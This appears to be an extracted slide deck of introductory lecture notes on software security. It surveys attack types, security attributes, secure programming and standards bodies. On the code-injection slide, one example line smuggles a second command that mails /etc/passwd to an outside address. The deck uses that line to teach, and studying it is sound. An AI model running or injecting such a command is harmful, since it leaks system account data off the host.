Embed Size (px)
Citation preview
1
ISEC0511Programming for Information
System Security
Lecture Notes #2Security in Software Systems
Vulnerability and Attacks
Vulnerability is a weak point in a system. There several ways in which vulnerabilities can be discovered. Exploiting Vulnerability
Once a security vulnerability is known, how to exploit it is also known.
What is not easily known is who has the device with the vulnerability and how to reach it.
Scanning systems in the network is a way to discover targets.
2
Vulnerability and Attacks
Passive Attacks When a hacker eavesdrops on your
system or monitors the transmitted packets, it is a passive attack.
Sensitive information such as credit card information can be discovered using this technique.
This is also called a sniffing attack.
3
Vulnerability and Attacks
Active Attacks The original object is disturbed or
manipulated. The hacker can impersonate you and log
into the remote system as you. Hacking
The process of exploiting vulnerabilities and launching an attack on computers is called hacking.
Hackers hack computers, networks, and telephone systems for profit, sometimes even for fun.
4
Vulnerability and Attacks
Social Engineering Social engineering is a technique used by
adversaries to manipulate the social and psychological behavior of people to gain access to information or do something that they will not do in a different social setup.
Identity Theft This is in order to get financial identity,
personal identity, medical records, business or commercial identity.
Phishing E-mail scam
5
Various Security Attacks
Brute-Force Attacks Try to find the right combination of
password or encryption key. The attack is also used by researchers
to test the strength of encryption algorithm.
Key strength is exponential to key size.
6
Various Security Attacks
Authentication Attacks In telecom network, a device is
authenticated. In data network, a user is
authenticated. Dictionary Attack
Passwords should never be based on known information.
The attack is also used to discover emails.
7
Various Security Attacks
Replay Attack Ali Baba did not know the meaning of this
phrase; he heard the bandits use. In a replay attack, the adversary replays a
genuine message captured earlier to perform a function intended for a legitimate user.
Password Guessing Knowing user ID is relatively easy. It is likely that we have a common user ID
and password for many accounts (banks, ATM, emails, credit cards)
Password Sniffing
8
Various Security Attacks
Spoofing attack Spoofed IP Spoofed emails Spoofed SMS
Denial-of-Service Attacks Distributed Denial-of-Service Attack Half-Open Attack or SYN-Flooding Denial of Service through User-ID Lock
Attack Ping of Death Attack Smurf Attack
9
Various Security Attacks
Packet Sniffer Tcpdump and Ethereal (Wireshark)
10
Taking Control of Application
To take control of applications, you need to make user execute your code. Overflow Attack Stack Smashing Attack Remote Procedure Call Attack Code Injection Attacks
echo Welcome $1 $2 $3 $4 hi;cat /etc/passwd|mail [email protected]
Luring Attack
11
Computer Security
Physical Security Operating System Security
Shell Security File System Security Kernel Security
Network Security
12
Typical Security in Data Network
13
Counter External Threats
Stopping Attacker the application should use all possible
defenses to protect itself and all its data. Firewall Intrusion Detection System Intrusion Prevention System Honeypot Penetration Test and Ethical Hacking
14
Security Programming
A programmer has a responsibility to ensure that the code written is secure and safe with minimum or no known vulnerability.
Security bugs have a very high impact.
15
Security Attributes
Confidentiality A mechanism through which we keep
the meaning of information or data secret.
This property is also known as privacy or encryption.
Integrity A property through which you can
detect whether your message or data have been corrupted or tampered with.
16
Security Attributes
Availability It is necessary that the service is
available for the period it is advertised.
Any attack on availability is called a DoS attack.
17
Security Attributes
Authentication Authentication is a process by which we
validate the identity of the parties. In nonrepudiation we identify the
identity of these parties beyond any doubt.
Digital signatures can achieve nonrepudiation.
One-factor authentication, Two-factor authentication, Multi-factor authentication.
18
Security Attributes
Authorization Usage constraints on objects based
on security level or privilege of the subject.
This attribute is also called fine-grained access control or role-based security.
19
Security Attributes
Accounting Accounting is the process by which the
usage of a service is metered. Audit trails and logs for transactions in an
application can also be considered as part of the accounting information.
These files need security so that adversaries cannot tamper or delete them.
Anonymity A property through which the user is
anonymous to the external world.
20
Secured Programming
In secured programming you use the security attributes to ensure that the input data are secure.
Also, you use these attributes to ensure that the processed information is secured.
You make the data and information secure using security algorithms, security protocols, and secured programming.
21
Safe Programming
You as a programmer need to ensure that whatever program you write does not have any security vulnerability.
The bottom line is that the programs you write need to be robust and failsafe.
22
Vulnerability Remediation
To minimize the security risks posed by software vulnerabilities, a two-step approach is necessary.
First, minimize the number of vulnerabilities in the software that is being developed, and
Second, minimize the number of vulnerabilities in the software that have already been deployed.
23
Vulnerability Remediation
Reducing the number of new vulnerabilities in the new software is the focus of secured and safe
programming, while removing existing vulnerabilities is the focus of vulnerability remediation.
24
Database Security
Database Authentication Database Privileges Secure Metadata Customize Access to Information
Views and Stored procedures High Availability Database Database Encryption
25
Security Standards
Public-Key Cryptographic Standards standards accepted as de facto standards
for public key cryptography helping interoperability between applications using cryptography for security.
CERT: Computer Emergency Response Team – www.cert.org
OWASP: Open Web Application Security Project) – www.owasp.org
26
Security Standards
NIST: National Institute of Standards and Technology – crsc.nist.gov
OASIS: Organization for the Advancement of Structured Information Standards
SSE-CMM: System Security Engineering Capability Maturity Model – www.sse-cmm.org
ISO17799
27
Readings
Architecting Secure Software Systems, Chapter 1.
28
